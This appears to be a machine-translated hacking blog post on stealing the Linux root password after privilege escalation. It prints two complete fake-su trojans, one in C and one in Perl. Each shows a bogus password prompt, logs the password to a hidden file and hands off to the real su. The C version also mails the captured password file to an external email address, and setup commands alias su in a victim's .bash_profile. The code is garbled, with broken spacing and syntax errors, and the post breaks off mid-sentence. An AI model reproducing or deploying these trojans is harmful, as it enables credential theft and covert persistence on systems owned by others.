Obtain the linux root password after Elevation of Privilege

After webbackdoor itself is root (potentially poor) or a vulnerability overflows to obtain the highest permissions, it can bring us many benefits if we can get the root password. I checked the methods of my predecessors. One is to cheat su to record the password, and the other is to replace sshd. Let's look at the code to cheat su to record the password!

First look at the first, kpr-fakesu.c V0.9beta167
Fucksu. c

/*
* Kpr-fakesu.c V0.9beta167; P.
* By koper <koper@linuxmail.org>
*
* Setting up:
* Admin @ host :~ $ Gcc-o. su fakesu. c; rm-rf fakesu. c
* Admin @ host :~ $ Mv. su/var/tmp/. su
* Admin @ host :~ $ Cp. bash_profile. wgetrc
* Admin @ host :~ $ Echo "alias su =/var/tmp/. su">. bash_profile
* Admin @ host :~ $ Logout
* ** LOGIN ***
* Admin @ host :~ $ Su
* Password:
* Su: Authentication failure
* Sorry.
* Admin @ host :~ $ Su
* Password:
* Root @ host :~ # Logout
* Admin @ host :~ $ Cat/var/tmp/. pwds
* Root: dupcia17
* Admin @ host :~ $
*
*/Bin/su sends varous failure information depending on the OS ver.
* Please modify the source to make it "fit"
*
*/

# Include <stdio. h>
# Include <stdlib. h>

Main (int argc, char * argv []) {

FILE * fp;
Char * user;
Char * pass;
Char filex [100];
Char clean [100];

Sprintf (filex, "/var/tmp/. pwds ");
Sprintf (clean, "rm-rf/var/tmp/. su; mv-f/home/admin/. wgetrc/home/admin/. bash_profile ");
If (argc = 1) user = "root ";
If (argc = 2) user = argv [1];
If (argc> 2 ){
If (strcmp (argv [1], "-l") = 0)
User = argv [2];
Else user = argv [1];}

Fprintf (stdout, "Password:"); pass = getpass ("");
System ("sleep 3 ″);
Fprintf (stdout, "su: Authentication failurenSorry. n ");

If (fp = fopen (filex, "w "))! = NULL)
{
Fprintf (fp, "% s: % sn", user, pass );
Fclose (fp );
}

System (clean );
System ("rm-rf/var/tmp/. su; ln-s/bin/su/var/tmp/. su ");

/* If you don't want password in your e-mail uncomment this line :*/

System ("uname-a>/var/tmp/. pwds; cat/var/tmp/. pwds | mail kalikosta@hotmail.com ");

}
 

 

Perl version

Perl version:
#! /Usr/bin/perl

######################################## ######################################## ####################
# Kyle@freeshell.se 2006 su trojan check so the su path is correct .#
# Then make alias for trojan first it reads the pass then exec the real su .#
# Logging to/tmp/. pass #
######################################## ######################################## ####################
Print "Password:"; $ s1 = <STDIN>;
Print "Sorry. n ";
$ S2 = "Password is:";
$ S3 = 'date + % Y-% m-% d ';
Open (users, ">/tmp/. pass") | die ("cocould not open file. $ !");
Print users ($ s2, $ s1, $ s3 );
Close (users );

System ("/bin/su ")

Another method is to replace sshd.

This article